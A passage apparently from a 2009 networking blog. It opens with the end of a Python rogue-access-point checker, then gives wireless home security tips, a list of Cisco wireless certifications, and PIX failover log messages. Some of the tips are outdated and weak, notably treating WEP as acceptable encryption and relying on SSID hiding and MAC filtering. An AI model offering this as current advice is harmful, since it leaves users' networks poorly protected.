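if __name__ == "__main__":
    for frame in (build_beacon(bytes.fromhex("001122334455"), b"corp-wifi", 6, True),
                  build_beacon(bytes.fromhex("66778899aabb"), b"corp-wifi", 6, False)):
        info = parse_beacon(frame)
        print(info, "->", check_ap(info, APPROVED))
```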

Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast 
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering 
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely 

http://www.insecure.in/wireless_hacking.asp

List of Wireless Certification

CISCO

http://www.cisco.com/web/learning/le3/learning_career_certifications_and_learning_paths_home.html

1. CCNA Wireless Certification


Cisco Certified Network Associate Wireless (CCNA® Wireless) validates associate-level knowledge and skills to configure, implement and support of wireless LANs, specifically those networks using Cisco equipment. With a CCNA Wireless certification, network professionals can support a basic wireless network on a Cisco WLAN in a SMB to enterprise network. The CCNA Wireless curriculum includes information and practice activities to prepare them for configuring, monitoring and troubleshooting basic tasks of a Cisco WLAN in SMB and Enterprise networks.

http://www.cisco.com/web/learning/le3/le2/le0/le2/learning_certification_type_home.html

2. CCIE Wireless Certification

The Cisco CCIE Wireless certification assesses and validates wireless expertise. Candidates who pass the CCIE Wireless certification exams demonstrate broad theoretical knowledge of wireless networking and a solid understanding of wireless local area networking (WLAN) technologies from Cisco, the market leader in WLAN technology.

http://www.cisco.com/web/learning/le3/ccie/wireless/index.html

Cisco Advanced Wireless LAN Design Specialist



The Cisco Advanced Wireless LAN Design Specialist will demonstrate the ability to successfully design solutions using the advanced feature set of Cisco wireless products and based on a validated understanding of radio frequency and antenna theory, 802.11a/b/g standards, site survey and configuration of controllers and APs. Solutions include voice over WLAN, outdoor mesh and secure wireless.

http://www.cisco.com/web/learning/le3/le2/le41/le86/le95/learning_certification_type_home_extra_level.html

CWNA® (Certified Wireless Network Administrator) 

http://www.cwnp.com/cwna/

Tuesday, February 3, 2009

Cisco PIX Firewall System Log Messages - End Configuration Replication

Log Message %PIX-1-709004: (Primary) End Configuration Replication (ACT)
Explanation This is a failover message. This message is logged when the Active unit completes replicating its configuration on the Standby unit. "(Primary)" can be either Primary or Secondary.
Recommended Action None required.

Log Message %PIX-1-709006: (Primary) End Configuration Replication (STB)
Explanation This is a failover message. This message is logged when the Standby unit completes replicating a configuration sent by the Active unit. "(Primary)" can be either Primary or Secondary.
Recommended Action None required.

http://www.cisco.com/en/US/docs/security/pix/pix44/system/message/pixemsgs.html

Monday, February 2, 2009

10 Tips for Wireless Home Network Security / 10 Wireless Security Tips

Many folks setting up wireless home networks rush through the job to
get their Internet connectivity working as quickly as possible. That's
totally understandable. It's also quite risky as numerous security
problems can result. Today's Wi-Fi networking products don't always
help the situation as configuring their security features can be time-
consuming and non-intuitive. The recommendations below summarize the
steps you should take to improve the security of your home wireless
network.

1. Change Default Administrator Passwords (and Usernames)
At the core of most Wi-Fi home networks is an access point or router.
To set up these pieces of equipment, manufacturers provide Web pages
that allow owners to enter their network address and account
information. These Web tools are protected with a login screen
(username and password) so that only the rightful owner can do this.
However, for any given piece of equipment, the logins provided are
simple and very well-known to hackers on the Internet. Change these
settings immediately.

2. Turn on (Compatible) WPA / WEP Encryption
All Wi-Fi equipment supports some form of encryption. Encryption
technology scrambles messages sent over wireless networks so that they
cannot be easily read by humans. Several encryption technologies exist
for Wi-Fi today. Naturally you will want to pick the strongest form of
encryption that works with your wireless network. However, the way
these technologies work, all Wi-Fi devices on your network must share
the identical encryption settings. Therefore you may need to find a
"lowest common denominator" setting.

3. Change the Default SSID
Access points and routers all use a network name called the SSID.
Manufacturers normally ship their products with the same SSID set. For
example, the SSID for Linksys devices is normally "linksys." True,
knowing the SSID does not by itself allow your neighbors to break into
your network, but it is a start. More importantly, when someone finds
a default SSID, they see it is a poorly configured network and are
much more likely to attack it. Change the default SSID immediately
when configuring wireless security on your network.

4. Enable MAC Address Filtering
Each piece of Wi-Fi gear possesses a unique identifier called the
physical address or MAC address. Access points and routers keep track
of the MAC addresses of all devices that connect to them. Many such
products offer the owner an option to key in the MAC addresses of
their home equipment, that restricts the network to only allow
connections from those devices. Do this, but also know that the
feature is not so powerful as it may seem. Hackers and their software
programs can fake MAC addresses easily.

5. Disable SSID Broadcast
In Wi-Fi networking, the wireless access point or router typically
broadcasts the network name (SSID) over the air at regular intervals.
This feature was designed for businesses and mobile hotspots where Wi-
Fi clients may roam in and out of range. In the home, this roaming
feature is unnecessary, and it increases the likelihood someone will
try to log in to your home network. Fortunately, most Wi-Fi access
points allow the SSID broadcast feature to be disabled by the network
administrator.

6. Do Not Auto-Connect to Open Wi-Fi Networks
Connecting to an open Wi-Fi network such as a free wireless hotspot or
your neighbor's router exposes your computer to security risks.
Although not normally enabled, most computers have a setting available
allowing these connections to happen automatically without notifying
you (the user). This setting should not be enabled except in temporary
situations.

7. Assign Static IP Addresses to Devices
Most home networkers gravitate toward using dynamic IP addresses. DHCP
technology is indeed easy to set up. Unfortunately, this convenience
also works to the advantage of network attackers, who can easily
obtain valid IP addresses from your network's DHCP pool. Turn off DHCP
on the router or access point, set a fixed IP address range instead,
then configure each connected device to match. Use a private IP
address range (like 10.0.0.x) to prevent computers from being directly
reached from the Internet.

8. Enable Firewalls On Each Computer and the Router
Modern network routers contain built-in firewall capability, but the
option also exists to disable them. Ensure that your router's firewall
is turned on. For extra protection, consider installing and running
personal firewall software on each computer connected to the router.

9. Position the Router or Access Point Safely
Wi-Fi signals normally reach to the exterior of a home. A small amount
of signal leakage outdoors is not a problem, but the further this
signal reaches, the easier it is for others to detect and exploit. Wi-
Fi signals often reach through neighboring homes and into streets, for
example. When installing a wireless home network, the position of the
access point or router determines its reach. Try to position these
devices near the center of the home rather than near windows to
minimize leakage.

10. Turn Off the Network During Extended Periods of Non-Use
The ultimate in wireless security measures, shutting down your network
will most certainly prevent outside hackers from breaking in! While
impractical to turn off and on the devices frequently, at least
consider doing so during travel or extended periods offline. Computer
disk drives have been known to suffer from power cycle wear-and-tear,
but this is a secondary concern for broadband modems and routers.

If you own a wireless router but are only using it wired (Ethernet)
connections, you can also sometimes turn off Wi-Fi on a broadband
router without powering down the entire network.
More Info

http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm
